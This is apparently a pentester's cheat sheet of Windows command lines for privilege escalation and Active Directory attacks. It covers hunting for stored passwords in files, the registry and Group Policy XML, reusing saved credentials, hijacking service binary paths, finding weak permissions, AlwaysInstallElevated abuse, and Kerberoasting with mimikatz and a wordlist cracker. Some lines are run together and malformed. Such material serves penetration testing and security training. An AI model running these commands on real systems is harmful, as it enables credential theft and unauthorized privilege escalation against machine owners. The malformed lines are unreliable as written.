hostname
systeminfo
#Get more precise information
systeminfo | findstr /b /i /c:"os version" /c:"os name" /c:"system type"
#logical disk
wmic logicaldisk get Caption ,description ,providername#network interface
ipconfig /all
#network service and established connection
netstat -ano
#route table
route print
#arp table
arp -awhoami /all
net users
net localgroup
net user <username>
net localgroup <groupname>#windows defender
sc query windefend#This command could take lots of time.
findstr /pisn /c:"password" /c:"passwd" *.ini *.txt *.conf *.config *.php *.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
dir /b /s *pass* == *cred* == *vnc* == *.config* |findstr /vr ".*.dll"
#Serching IIS server configure
dir /b /s "web.config"
dir /b /s "web.config" | findstr /f:/ /i "password"
#Looking for credentials that was stored in cmdkey,and login with the save credential
cmdkey /list
c:windows\system32\runas.exe /user:<username> /savecred <command>
#Policy reference
dir /s Groups.xml
findstr /s /c:"cpassword"
#In registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
#windows autologin
#You definitely should check both /reg:32 and /reg:64 (They will show different results)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" /reg:64tasklist /svc#Scheduled task
schtasks /query /fo list /v
schtasks /query /fo list /v | findstr /c:"Task To Run:"
schtasks /query /fo list /v | findstr "TaskName"
schtasks /query /tn "<task name>" /fo list /v
#Using wmic to get service list
wmic service get displayname,pathname
wmic service where Caption="<service name>" get name,caption,state,startmode
#Using powershell to get service list
Get-WmiObject win32_service | Select-Object Name,State,PathName|?{$_.State -like "Running"}
#service controller
sc queryex type=service
sc qc <service name>
#Checking all service access rights by accesschk.exe(-c means checking services,not files)
accesschk.exe -accepteula -ucvw "everyone" *
#configure service settings
sc config <service name> binpath= "<command>"
#service acl checking
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"
#start service
sc start <service name>
net start <service name>
#stop service(need administrator permission)
sc stop <service name>
net stop <service name>Get-Acl -path <registry path>|fl#only list application that was installed by windows installer
wmic product get name ,version ,vendor
#Hot patched
wmic qfe get Caption,Description,HotFixId,InstalledOnicacls.exe <Pathname>
#Find all weak permission files
accesschk.exe -accepteula -uws "everyone" "C:\*.*"
accesschk64.exe -accepteula -uws "Users" "C:\*.*"
accesschk64.exe -accepteula -uws "Authenticated Users" "C:\*.*"
#Find all weak permission directories
accesschk64.exe -accepteula -uwsd "everyone" "C:\*.*"
accesschk64.exe -accepteula -uwsd "Users" "C:\*.*"
accesschk64.exe -accepteula -uwsd "Authenticated Users" "C:\*.*"
#If we can't transfer accesschk.exe to client or accesschk.exe doesn't work.
#This powershell command.
Get-ChildItem "C:\program files" -Recurse|Get-Acl|?{$_.AccessToString -match "Everyone\sAllow\s\sMo
dify"}
#Check if we can write at startup directory(less common)
#Current user
icacls.exe "C:\<Users>\<Username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
#All users
icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
where /r c:\ <filename>
#for example,bash.exe and wsl.exe(wsl.exe could be EoP path,too.)
where /r c:\ bash.exe
where /r c:\ wsl.exe#Device
mountvol
#Driver
driverquery.exe /v /fo csv|ConvertFrom-Csv|Select-Object 'Display Name' ,'Start Mode','Path'
#Driver
#This is powershell command
Get-WmiObject Win32_PnPSignedDriver|Select-Object DeviceName,DriverVersion,Manufacturer|?{$_.DeviceName -like "*VMware*"}AlwaysInstallElevated
#if both value are 0x01,then we can craft .msi file to exploit it.
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElvated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElvated
#Display alternate data streams of the file.
dir /r
#list all file(include subdirectories) under current directory and exclude some unwanted file
dir /s /b | findstr /r /i /v "<unwanted file>"
#check if firewall open
netsh advfirewall show currentprofile
netsh firewall show state
#check the firewall rule
netsh advfirewall firewall show rule name=all
netsh firewall show config
#check the value of the key EnableLUA, if it's 1 then UAC is activated,else UAC is inactivated.
#check the value of the key ConsentPromptBehaviorAdmin.
#https://github.com/carlospolop/hacktricks/blob/master/windows/credentials.md#uac
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
#Domain user enumeration
net user /domain
net user <domain user> /domain
#Domain group enumeration
net group /domain
#Using powershell geather doamin information
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
#Check for SPN
setspn -T <domain name> -Q */*
#Request service ticket
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"
#Export TGS tickets
mimikatz.exe "token::elevate" "privilege::debug" "kerberos::list /export" exit
#Crack SPN's password(only for KerbTicket Encryption Type: RSADSI RC4-HMAC(NT))
/usr/share/kerberoast/tgsrepcrack.py /usr/share/wordlists/rockyou.txt ./mssql.kirbi
windows-privesc-check2.exehttps://www.fuzzysecurity.com/tutorials/16.html https://pentestlab.blog/2017/04/19/stored-credentials/ https://github.com/carlospolop/hacktricks/blob/master/windows/windows-local-privilege-escalation/README.md https://github.com/carlospolop/hacktricks/blob/master/windows/credentials.md#uac